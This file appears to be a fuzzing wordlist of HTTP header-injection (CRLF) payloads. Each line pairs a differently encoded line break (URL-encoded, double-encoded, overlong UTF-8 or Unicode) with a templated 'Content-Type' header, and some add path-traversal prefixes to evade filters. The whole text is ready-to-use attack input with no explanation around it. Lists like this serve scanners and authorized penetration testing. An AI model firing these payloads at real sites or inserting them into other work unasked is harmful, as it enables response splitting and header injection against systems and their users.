%0aContent-Type:%20{ct}
%0dContent-Type:%20{ct}
%%0a0aContent-Type:%20{ct}
%0d%0aContent-Type:%20{ct}
%0d%0a%0d%0aContent-Type:%20{ct}
%23%0aContent-Type:%20{ct}
%23%0dContent-Type:%20{ct}
%23%0d%0aContent-Type:%20{ct}
%25%30%61Content-Type:%20{ct}
%25%30aContent-Type:%20{ct}
%250aContent-Type:%20{ct}
%25250aContent-Type:%20{ct}
%2F..%0d%0aContent-Type:%20{ct}
%2e%2e%2f%0d%0aContent-Type:%20{ct}
%2f%2e%2e%0d%0aContent-Type:%20{ct}
%3f%0dContent-Type:%20{ct}
%3f%0d%0aContent-Type:%20{ct}
%C0%8D%C0%8AContent-Type:%20{ct}
%EA%A8%8AContent-Type:%20{ct}
%c4%8d%c4%8aContent-Type:%20{ct}
%u000aContent-Type:%20{ct}
%u000d%u000aContent-Type:%20{ct}
%u2028%u2029Content-Type:%20{ct}
\u000d\u000aContent-Type:%20{ct}
\u2028\u2029Content-Type:%20{ct}
